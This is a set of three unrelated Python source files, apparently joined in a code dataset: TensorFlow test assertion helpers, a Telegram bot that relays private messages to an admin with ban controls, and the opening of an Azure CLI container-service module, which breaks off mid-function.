def assertAllGreaterEqual(self, a, comparison_target):
  """Assert element values are all greater than or equal to a target value.

  (Docstring fix: the original omitted "or equal"; the code asserts
  min(a) >= comparison_target.)

  Args:
    a: The numpy `ndarray`, or anything that can be converted into a
      numpy `ndarray` (including Tensor).
    comparison_target: The target value of comparison.
  """
  a = self._GetNdArray(a)
  self.assertGreaterEqual(np.min(a), comparison_target)
def assertAllLessEqual(self, a, comparison_target):
  """Assert element values are all less than or equal to a target value.

  (Docstring fix: the original said "greater", copied from
  `assertAllGreater`; the code asserts max(a) <= comparison_target.)

  Args:
    a: The numpy `ndarray`, or anything that can be converted into a
      numpy `ndarray` (including Tensor).
    comparison_target: The target value of comparison.
  """
  a = self._GetNdArray(a)
  self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
  """Generate a summary of ndarray subscripts as a list of str.

  If limit == N, this method will print up to the first N subscripts on
  separate lines. A line of ellipses (...) will be appended at the end if
  the number of subscripts exceeds N.

  Args:
    subscripts: The tensor (np.ndarray) subscripts, of the same format as
      np.where()'s return value, i.e., a tuple of arrays with each array
      corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
    value: (np.ndarray) value of the tensor.
    limit: (int) The maximum number of indices to print.
    indent: (int) Number of characters to indent at the beginning of each
      line.

  Returns:
    (list of str) the multi-line representation of the subscripts and
    values, potentially with omission at the end.
  """
  # Transpose the per-dimension arrays into one coordinate tuple per element.
  coords = np.transpose(subscripts)
  pad = " " * indent
  summary = [
      pad + str(coord) + " : " + str(value[tuple(coord)])
      for coord in itertools.islice(coords, limit)
  ]
  if len(coords) > limit:
    summary.append(pad + "...")
  return summary
def assertAllInRange(self,
                     target,
                     lower_bound,
                     upper_bound,
                     open_lower_bound=False,
                     open_upper_bound=False):
  """Assert that elements in a Tensor are all in a given range.

  Args:
    target: The numpy `ndarray`, or anything that can be converted into a
      numpy `ndarray` (including Tensor).
    lower_bound: lower bound of the range
    upper_bound: upper bound of the range
    open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
      than the default >=)
    open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
      than the default <=)

  Raises:
    AssertionError:
      if the value tensor does not have an ordered numeric type (float* or
      int*), or
      if there are nan values, or
      if any of the elements do not fall in the specified range.
  """
  target = self._GetNdArray(target)
  # Fix: `np.float` was a deprecated alias for builtin `float` and has been
  # removed from NumPy; `np.floating` is the abstract base dtype intended
  # for `issubdtype` checks over all float widths.
  if not (np.issubdtype(target.dtype, np.floating) or
          np.issubdtype(target.dtype, np.integer)):
    raise AssertionError(
        "The value of %s does not have an ordered numeric type, instead it "
        "has type: %s" % (target, target.dtype))

  # Fail fast on NaNs: they compare False with everything, so they would
  # otherwise surface as confusing range violations.
  nan_subscripts = np.where(np.isnan(target))
  if np.size(nan_subscripts):
    raise AssertionError(
        "%d of the %d element(s) are NaN. "
        "Subscripts(s) and value(s) of the NaN element(s):\n" %
        (len(nan_subscripts[0]), np.size(target)) +
        "\n".join(self._format_subscripts(nan_subscripts, target)))

  range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
               str(upper_bound) + (")" if open_upper_bound else "]"))
  violations = (
      np.less_equal(target, lower_bound)
      if open_lower_bound else np.less(target, lower_bound))
  violations = np.logical_or(
      violations,
      np.greater_equal(target, upper_bound)
      if open_upper_bound else np.greater(target, upper_bound))
  violation_subscripts = np.where(violations)
  if np.size(violation_subscripts):
    raise AssertionError(
        "%d of the %d element(s) are outside the range %s. " %
        (len(violation_subscripts[0]), np.size(target), range_str) +
        "Subscript(s) and value(s) of the offending elements:\n" +
        "\n".join(self._format_subscripts(violation_subscripts, target)))
def assertAllInSet(self, target, expected_set):
  """Assert that elements of a Tensor are all in a given closed set.

  Args:
    target: The numpy `ndarray`, or anything that can be converted into a
      numpy `ndarray` (including Tensor).
    expected_set: (`list`, `tuple` or `set`) The closed set that the elements
      of the value of `target` are expected to fall into.

  Raises:
    AssertionError:
      if any of the elements do not fall into `expected_set`.
  """
  arr = self._GetNdArray(target)
  # Unique elements of `target` that are absent from `expected_set`.
  missing = np.setdiff1d(arr.flatten(), list(expected_set))
  if missing.size:
    raise AssertionError("%d unique element(s) are not in the set %s: %s" %
                         (missing.size, expected_set, missing))
def assertDTypeEqual(self, target, expected_dtype):
  """Assert ndarray data type is equal to expected.

  Args:
    target: The numpy `ndarray`, or anything that can be converted into a
      numpy `ndarray` (including Tensor).
    expected_dtype: Expected data type.
  """
  target = self._GetNdArray(target)
  # Bug fix: the original only assigned `arrays` inside
  # `if not isinstance(target, list)`, so a list input hit the loop with
  # `arrays` unbound and raised NameError instead of being checked.
  arrays = target if isinstance(target, list) else [target]
  for arr in arrays:
    self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
                                   expected_err_re_or_predicate):
  """Returns a context manager to enclose code expected to raise an exception.

  If the exception is an OpError, the op stack is also included in the message
  predicate search.

  Args:
    exception_type: The expected type of exception that should be raised.
    expected_err_re_or_predicate: If this is callable, it should be a function
      of one argument that inspects the passed-in exception and
      returns True (success) or False (please fail the test). Otherwise, the
      error message is expected to match this regular expression partially.

  Returns:
    A context manager to surround code that is expected to raise an
    exception.
  """
  if callable(expected_err_re_or_predicate):
    predicate = expected_err_re_or_predicate
  else:

    def predicate(e):
      # For OpErrors, search the message plus the names of the ops that
      # caused it, following the _original_op chain.
      err_str = e.message if isinstance(e, errors.OpError) else str(e)
      op = e.op if isinstance(e, errors.OpError) else None
      while op is not None:
        err_str += "\nCaused by: " + op.name
        op = op._original_op  # pylint: disable=protected-access
      logging.info("Searching within error strings: '%s' within '%s'",
                   expected_err_re_or_predicate, err_str)
      return re.search(expected_err_re_or_predicate, err_str)

  try:
    yield
    # Reached only if the enclosed block raised nothing.
    self.fail(exception_type.__name__ + " not raised")
  except Exception as e:  # pylint: disable=broad-except
    # Any exception of the wrong type, or failing the predicate, is
    # converted into an AssertionError (this includes the fail() above).
    if not isinstance(e, exception_type) or not predicate(e):
      raise AssertionError("Exception of type %s: %s" % (str(type(e)),
                                                         str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
  """Returns a context manager asserting that an `errors.OpError` is raised.

  Message/predicate matching follows `assertRaisesWithPredicateMatch`.
  """
  return self.assertRaisesWithPredicateMatch(
      errors.OpError, expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
  """Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.

  Args:
    np_array: A Numpy ndarray or Numpy scalar.
    tf_tensor: A Tensor.
    msg: Optional message to report on failure.

  Raises:
    TypeError: If the arguments have the wrong type.
  """
  if not isinstance(np_array, (np.ndarray, np.generic)):
    raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
  if not isinstance(tf_tensor, ops.Tensor):
    raise TypeError("tf_tensor must be a Tensor")
  expected_shape = np_array.shape
  actual_shape = tf_tensor.get_shape().as_list()
  self.assertAllEqual(expected_shape, actual_shape, msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
  """Asserts that the two given devices are the same.

  Args:
    device1: A string device name or TensorFlow `DeviceSpec` object.
    device2: A string device name or TensorFlow `DeviceSpec` object.
    msg: Optional message to report on failure.
  """
  # Canonicalize both sides so spelling differences don't cause failures.
  canonical1 = pydev.canonical_name(device1)
  canonical2 = pydev.canonical_name(device2)
  failure_message = "Devices %s and %s are not equal. %s" % (canonical1,
                                                             canonical2, msg)
  self.assertEqual(canonical1, canonical2, failure_message)
# Fix Python 3 compatibility issues
if six.PY3:
  # pylint: disable=invalid-name

  # Python 3 renamed several unittest helpers; alias the old names used
  # throughout the TF test suite to their modern equivalents so calls don't
  # emit deprecation warnings (or fail outright on assertItemsEqual).

  # Silence a deprecation warning
  assertRaisesRegexp = googletest.TestCase.assertRaisesRegex

  # assertItemsEqual is assertCountEqual as of 3.2.
  assertItemsEqual = googletest.TestCase.assertCountEqual

  # pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
                         num_ps,
                         protocol="grpc",
                         worker_config=None,
                         ps_config=None):
  """Create and start local servers and return the associated `Server` objects.

  Example:
  ```python
  workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)

  worker_sessions = [tf.Session(w.target) for w in workers]

  with tf.device("/job:ps/task:0"):
    ...
  with tf.device("/job:ps/task:1"):
    ...
  with tf.device("/job:worker/task:0"):
    ...
  with tf.device("/job:worker/task:1"):
    ...

  worker_sessions[0].run(...)
  ```

  Args:
    num_workers: Number of worker servers to start.
    num_ps: Number of PS servers to start.
    protocol: Communication protocol. Allowed values are documented in
      the documentation of `tf.train.Server`.
    worker_config: (optional) ConfigProto to initialize workers. Can be used
      to instantiate multiple devices etc.
    ps_config: (optional) ConfigProto to initialize PS servers.

  Returns:
    A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
    of `num_workers` objects of type `tf.train.Server` (all running locally);
    and `ps_servers` is a list of `num_ps` objects of similar type.

  Raises:
    ImportError: if portpicker module was not found at load time
  """
  if _portpicker_import_error:
    raise _portpicker_import_error  # pylint: disable=raising-bad-type

  # One free local port per task; the cluster spec maps each task index to
  # its localhost endpoint.
  worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
  ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
  cluster_dict = {
      "worker": ["localhost:%s" % port for port in worker_ports],
      "ps": ["localhost:%s" % port for port in ps_ports],
  }
  cs = server_lib.ClusterSpec(cluster_dict)

  def _start_servers(job_name, count, config):
    # One started in-process server per task index of the given job.
    return [
        server_lib.Server(
            cs,
            job_name=job_name,
            protocol=protocol,
            task_index=ix,
            config=config,
            start=True) for ix in range(count)
    ]

  workers = _start_servers("worker", num_workers, worker_config)
  ps_servers = _start_servers("ps", num_ps, ps_config)
  return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
  """Returns the `NodeDef` instance for given node name in the graph def.

  This method explores only the NodeDefs in `graph_def.node`.

  Args:
    node_name: Name of the NodeDef to search for.
    graph_def: An instance of `GraphDef` proto.

  Returns:
    the `NodeDef` instance whose name field matches the given node_name or
    None.
  """
  # First match wins; None when no NodeDef carries the requested name.
  return next(
      (node_def for node_def in graph_def.node if node_def.name == node_name),
      None)
def set_producer_version(graph, producer_version):
  """Sets graph.graph_def_versions.producer to `producer_version`."""
  # The C API doesn't expose altering GraphDefVersions. We can indirectly set
  # it via import_graph_def though.
  graph_def = graph_pb2.GraphDef()
  graph_def.versions.producer = producer_version
  with graph.as_default():
    importer.import_graph_def(graph_def)
  # Bug fix: `assert x, y` only checks that x is truthy and uses y as the
  # failure message -- the original never compared against producer_version.
  assert graph.graph_def_versions.producer == producer_version
|
main.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import json
import telegram.ext
import telegram
import sys
import datetime
import os
import logging
import threading
Version_Code = 'v1.1.0'  # version string reported by the /version command

logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
                    )

# All data files live next to this script.
PATH = os.path.dirname(os.path.realpath(__file__)) + '/'
CONFIG = json.loads(open(PATH + 'config.json', 'r').read())  # load bot configuration
LANG = json.loads(open(PATH + 'lang/' + CONFIG['Lang'] + '.json'
                  ).read())  # load language/translation strings

# Crude busy-wait flags guarding the JSON files against concurrent writers.
MESSAGE_LOCK = False
message_list = json.loads(open(PATH + 'data.json', 'r').read())  # forwarded-message -> sender mapping
PREFERENCE_LOCK = False
preference_list = json.loads(open(PATH + 'preference.json', 'r').read())  # per-user profile & settings
def save_data():  # persist forwarded-message metadata
    """Write `message_list` to data.json, serialized via MESSAGE_LOCK."""
    global MESSAGE_LOCK
    # Busy-wait until any in-flight writer finishes (crude spin lock).
    while MESSAGE_LOCK:
        time.sleep(0.05)
    MESSAGE_LOCK = True
    try:
        # `with` closes the handle even if dumping fails.
        with open(PATH + 'data.json', 'w') as f:
            f.write(json.dumps(message_list))
    finally:
        # Always release the lock; otherwise one failed save wedges every
        # subsequent save_data() call in the busy-wait above.
        MESSAGE_LOCK = False
def save_preference():  # persist user profiles & settings
    """Write `preference_list` to preference.json, serialized via PREFERENCE_LOCK."""
    global PREFERENCE_LOCK
    # Busy-wait until any in-flight writer finishes (crude spin lock).
    while PREFERENCE_LOCK:
        time.sleep(0.05)
    PREFERENCE_LOCK = True
    try:
        # `with` closes the handle even if dumping fails.
        with open(PATH + 'preference.json', 'w') as f:
            f.write(json.dumps(preference_list))
    finally:
        # Always release the lock; otherwise one failed save wedges every
        # subsequent save_preference() call in the busy-wait above.
        PREFERENCE_LOCK = False
def save_config():  # persist bot configuration
    """Write CONFIG to config.json, pretty-printed."""
    # `with` guarantees the handle is closed (the original leaked it on error).
    with open(PATH + 'config.json', 'w') as f:
        f.write(json.dumps(CONFIG, indent=4))
def init_user(user):
    """Ensure `user` has a preference record; refresh the cached name if it changed."""
    global preference_list
    uid = str(user.id)
    if uid not in preference_list:  # first time this user talks to the bot
        preference_list[uid] = {
            'notification': False,   # delivery receipts off by default
            'blocked': False,        # new users start unbanned
            'name': user.full_name,  # cached display name
        }
        threading.Thread(target=save_preference).start()
        return
    if 'blocked' not in preference_list[uid]:  # records written by v1.0.x lack this key
        preference_list[uid]['blocked'] = False
    if preference_list[uid]['name'] != user.full_name:  # display name changed
        preference_list[uid]['name'] = user.full_name
        threading.Thread(target=save_preference).start()
updater = telegram.ext.Updater(token=CONFIG['Token'])
dispatcher = updater.dispatcher

# Ask Telegram who we are and cache the bot's id/username in CONFIG; the
# username is later stripped from "/command@botname" invocations.
me = updater.bot.get_me()
CONFIG['ID'] = me.id
CONFIG['Username'] = '@' + me.username
print('Starting... (ID: ' + str(CONFIG['ID']) + ', Username: ' \
      + CONFIG['Username'] + ')')
def process_msg(bot, update):  # relay non-command private messages
    """Relay messages between the admin and everyone else.

    Messages from ordinary users are forwarded to the admin. When the admin
    replies to one of those forwarded messages, the reply is re-sent
    anonymously to the original sender, looked up in `message_list`.
    """
    global message_list
    init_user(update.message.from_user)
    if CONFIG['Admin'] == 0:  # no admin configured yet
        bot.send_message(chat_id=update.message.from_user.id,
                         text=LANG['please_setup_first'])
        return
    if update.message.from_user.id == CONFIG['Admin']:  # message from the admin
        if update.message.reply_to_message:  # admin replied to a forwarded message
            if str(update.message.reply_to_message.message_id) in message_list:  # sender mapping exists
                msg = update.message
                sender_id = message_list[str(update.message.reply_to_message.message_id)]['sender_id']
                # Re-send the admin's reply to the original sender without
                # revealing the admin's account (anonymous relay, one branch
                # per supported media type).
                try:
                    if msg.audio:
                        bot.send_audio(chat_id=sender_id,
                                       audio=msg.audio, caption=msg.caption)
                    elif msg.document:
                        bot.send_document(chat_id=sender_id,
                                          document=msg.document,
                                          caption=msg.caption)
                    elif msg.voice:
                        bot.send_voice(chat_id=sender_id,
                                       voice=msg.voice, caption=msg.caption)
                    elif msg.video:
                        bot.send_video(chat_id=sender_id,
                                       video=msg.video, caption=msg.caption)
                    elif msg.sticker:
                        bot.send_sticker(chat_id=sender_id,
                                         sticker=update.message.sticker)
                    elif msg.photo:
                        # NOTE(review): photo[0] is one size variant of the
                        # photo; confirm whether the largest size was intended.
                        bot.send_photo(chat_id=sender_id,
                                       photo=msg.photo[0], caption=msg.caption)
                    elif msg.text_markdown:
                        bot.send_message(chat_id=sender_id,
                                         text=msg.text_markdown,
                                         parse_mode=telegram.ParseMode.MARKDOWN)
                    else:
                        bot.send_message(chat_id=CONFIG['Admin'],
                                         text=LANG['reply_type_not_supported'])
                        return
                except Exception as e:
                    # NOTE(review): `e.message` exists on telegram API errors;
                    # a non-telegram exception caught here would itself raise
                    # AttributeError -- confirm before relying on this path.
                    if e.message \
                            == 'Forbidden: bot was blocked by the user':
                        bot.send_message(chat_id=CONFIG['Admin'],
                                         text=LANG['blocked_alert'])  # recipient blocked the bot
                    else:
                        bot.send_message(chat_id=CONFIG['Admin'],
                                         text=LANG['reply_message_failed'])
                    return
                if preference_list[str(update.message.from_user.id)]['notification']:  # delivery receipts enabled
                    bot.send_message(chat_id=update.message.chat_id,
                                     text=LANG['reply_message_sent']
                                     % (preference_list[str(sender_id)]['name'],
                                        str(sender_id)),
                                     parse_mode=telegram.ParseMode.MARKDOWN)
            else:
                bot.send_message(chat_id=CONFIG['Admin'],
                                 text=LANG['reply_to_message_no_data'])
        else:
            bot.send_message(chat_id=CONFIG['Admin'],
                             text=LANG['reply_to_no_message'])
    else:  # message from an ordinary user
        if preference_list[str(update.message.from_user.id)]['blocked']:  # banned users get a notice only
            bot.send_message(chat_id=update.message.from_user.id,text=LANG['be_blocked_alert'])
            return
        fwd_msg = bot.forward_message(chat_id=CONFIG['Admin'],
                                      from_chat_id=update.message.chat_id,
                                      message_id=update.message.message_id)  # forward to the admin
        if fwd_msg.sticker:  # stickers show no sender header, so attach one
            bot.send_message(chat_id=CONFIG['Admin'],
                             text=LANG['info_data']
                             % (update.message.from_user.full_name,
                                str(update.message.from_user.id)),
                             parse_mode=telegram.ParseMode.MARKDOWN,
                             reply_to_message_id=fwd_msg.message_id)
        if preference_list[str(update.message.from_user.id)]['notification']:  # delivery receipts enabled
            bot.send_message(chat_id=update.message.from_user.id,text=LANG['message_received_notification'])
        # Remember which user the forwarded copy belongs to so admin replies
        # can be routed back.
        message_list[str(fwd_msg.message_id)] = {}
        message_list[str(fwd_msg.message_id)]['sender_id'] = update.message.from_user.id
        threading.Thread(target=save_data).start()  # persist the mapping
    pass
def process_command(bot, update):  # handle slash commands
    """Dispatch bot commands: /start, /version, /setadmin, /togglenotification,
    /info, /ping, /ban, /unban.

    Admin-only commands verify both the sender id and the chat id against
    CONFIG['Admin'].
    """
    init_user(update.message.from_user)
    # Renamed from `id`, which shadowed the builtin of the same name.
    uid = update.message.from_user.id
    global CONFIG
    global preference_list
    # Strip the leading '/', drop an optional '@botname' suffix, lowercase,
    # and split into [command, args...].
    command = update.message.text[1:].replace(CONFIG['Username'], ''
                                              ).lower().split()
    if command[0] == 'start':
        bot.send_message(chat_id=update.message.chat_id,
                         text=LANG['start'])
        return
    elif command[0] == 'version':
        bot.send_message(chat_id=update.message.chat_id,
                         text='Telegram Private Message Chat Bot\n'
                         + Version_Code
                         + '\nhttps://github.com/Netrvin/telegram-pm-chat-bot'
                         )
        return
    elif command[0] == 'setadmin':  # claim admin ownership of the bot
        if CONFIG['Admin'] == 0:  # only allowed while no admin is set
            CONFIG['Admin'] = int(update.message.from_user.id)
            save_config()
            bot.send_message(chat_id=update.message.chat_id,
                             text=LANG['set_admin_successful'])
        else:
            bot.send_message(chat_id=update.message.chat_id,
                             text=LANG['set_admin_failed'])
        return
    elif command[0] == 'togglenotification':  # flip delivery receipts
        # Idiom fix: `not x` instead of `x == False`.
        preference_list[str(uid)]['notification'] = \
            not preference_list[str(uid)]['notification']
        threading.Thread(target=save_preference).start()
        if preference_list[str(uid)]['notification']:
            bot.send_message(chat_id=update.message.chat_id,
                             text=LANG['togglenotification_on'])
        else:
            bot.send_message(chat_id=update.message.chat_id,
                             text=LANG['togglenotification_off'])
    elif command[0] == 'info':  # show the original sender of a forwarded message
        if update.message.from_user.id == CONFIG['Admin'] \
                and update.message.chat_id == CONFIG['Admin']:
            if update.message.reply_to_message:
                if str(update.message.reply_to_message.message_id) in message_list:
                    sender_id = message_list[str(update.message.reply_to_message.message_id)]['sender_id']
                    bot.send_message(chat_id=update.message.chat_id,
                                     text=LANG['info_data']
                                     % (preference_list[str(sender_id)]['name'],
                                        str(sender_id)),
                                     parse_mode=telegram.ParseMode.MARKDOWN,
                                     reply_to_message_id=update.message.reply_to_message.message_id)
                else:
                    bot.send_message(chat_id=update.message.chat_id, text=LANG['reply_to_message_no_data'])
            else:
                bot.send_message(chat_id=update.message.chat_id, text=LANG['reply_to_no_message'])
        else:
            bot.send_message(chat_id=update.message.chat_id, text=LANG['not_an_admin'])
    elif command[0] == 'ping':  # liveness check
        bot.send_message(chat_id=update.message.chat_id, text='Pong!')
    elif command[0] == 'ban':  # ban the sender of the replied-to message
        if update.message.from_user.id == CONFIG['Admin'] \
                and update.message.chat_id == CONFIG['Admin']:
            if update.message.reply_to_message:
                if str(update.message.reply_to_message.message_id) in message_list:
                    sender_id = message_list[str(update.message.reply_to_message.message_id)]['sender_id']
                    preference_list[str(sender_id)]['blocked'] = True
                    bot.send_message(chat_id=update.message.chat_id,
                                     text=LANG['ban_user']
                                     % (preference_list[str(sender_id)]['name'],
                                        str(sender_id)),
                                     parse_mode=telegram.ParseMode.MARKDOWN)
                    bot.send_message(chat_id=sender_id, text=LANG['be_blocked_alert'])
                else:
                    bot.send_message(chat_id=update.message.chat_id, text=LANG['reply_to_message_no_data'])
            else:
                bot.send_message(chat_id=update.message.chat_id, text=LANG['reply_to_no_message'])
        else:
            bot.send_message(chat_id=update.message.chat_id, text=LANG['not_an_admin'])
    elif command[0] == 'unban':  # lift a ban, by reply or by explicit user id
        if update.message.from_user.id == CONFIG['Admin'] \
                and update.message.chat_id == CONFIG['Admin']:
            if update.message.reply_to_message:
                if str(update.message.reply_to_message.message_id) in message_list:
                    sender_id = message_list[str(update.message.reply_to_message.message_id)]['sender_id']
                    preference_list[str(sender_id)]['blocked'] = False
                    bot.send_message(chat_id=update.message.chat_id,
                                     text=LANG['unban_user']
                                     % (preference_list[str(sender_id)]['name'],
                                        str(sender_id)),
                                     parse_mode=telegram.ParseMode.MARKDOWN)
                    bot.send_message(chat_id=sender_id, text=LANG['be_unbanned'])
                else:
                    bot.send_message(chat_id=update.message.chat_id, text=LANG['reply_to_message_no_data'])
            elif len(command) == 2:  # /unban <user_id>
                if command[1] in preference_list:
                    preference_list[command[1]]['blocked'] = False
                    bot.send_message(chat_id=update.message.chat_id,
                                     text=LANG['unban_user']
                                     % (preference_list[command[1]]['name'],
                                        command[1]),
                                     parse_mode=telegram.ParseMode.MARKDOWN)
                    bot.send_message(chat_id=int(command[1]), text=LANG['be_unbanned'])
                else:
                    bot.send_message(chat_id=update.message.chat_id, text=LANG['user_not_found'])
            else:
                bot.send_message(chat_id=update.message.chat_id, text=LANG['reply_or_enter_id'])
        else:
            bot.send_message(chat_id=update.message.chat_id, text=LANG['not_an_admin'])
    else:  # unknown command
        bot.send_message(chat_id=update.message.chat_id, text=LANG['nonexistent_command'])
# Register handlers
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.all
                       & telegram.ext.Filters.private
                       & ~telegram.ext.Filters.command
                       & ~telegram.ext.Filters.status_update,
                       process_msg))  # plain private messages
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.command
                       & telegram.ext.Filters.private, process_command))  # slash commands
updater.start_polling()  # begin long-polling Telegram for updates
print('Started')
updater.idle()  # block until SIGINT/SIGTERM
print('Stopping...')
save_data()  # flush forwarded-message metadata
save_preference()  # flush user profiles & settings
print('Data saved.')
print('Stopped.')
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2020_09_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_09_01.models import AgentPool
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterMonitorProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_managed_clusters
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
    """Locate *binary* on the system PATH.

    Returns the full path of the first matching executable file, or None when
    nothing matches. On Windows, '.exe' is appended to the name and PATH is
    split on ';' instead of ':'.
    """
    search_path = os.getenv('PATH')
    if platform.system() == 'Windows':
        target = binary + '.exe'
        directories = search_path.split(';')
    else:
        target = binary
        directories = search_path.split(':')
    for directory in directories:
        candidate = os.path.join(directory, target)
        is_executable_file = (os.path.exists(candidate)
                              and os.path.isfile(candidate)
                              and os.access(candidate, os.X_OK))
        if is_executable_file:
            return candidate
    return None
def wait_then_open(url):
    """
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
    """
    # Poll the URL up to 9 times, sleeping 1s after each connection failure.
    # Bug fix: the original had an unconditional `break` at loop-body level,
    # so the loop always exited after one iteration and never retried; break
    # only once the URL actually answers.
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break
        except URLError:
            time.sleep(1)
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
    """
    Spawns a daemon thread that waits for a bit then opens a URL.
    """
    # Bug fix: `args` was the set literal `({url})`; it only worked because
    # Thread unpacks any iterable. Pass the conventional 1-tuple instead.
    t = threading.Thread(target=wait_then_open, args=(url,))
    # Daemonize so a lingering opener thread never blocks CLI shutdown.
    t.daemon = True
    t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
    """
    Opens a browser to the web interface for the cluster orchestrator

    :param name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
    :type ssh_key_file: string
    """
    # Resolve the cluster first, then hand off to the orchestrator dispatcher.
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _acs_browse_internal(cmd, client, cluster_info, resource_group_name, name,
                         disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
    """Dispatch `browse` to the orchestrator-specific implementation."""
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    normalized = str(orchestrator_type).lower()
    is_kubernetes = (
        normalized == 'kubernetes'
        or orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes
        or (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'))  # pylint: disable=no-member
    if is_kubernetes:
        return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
    if normalized == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
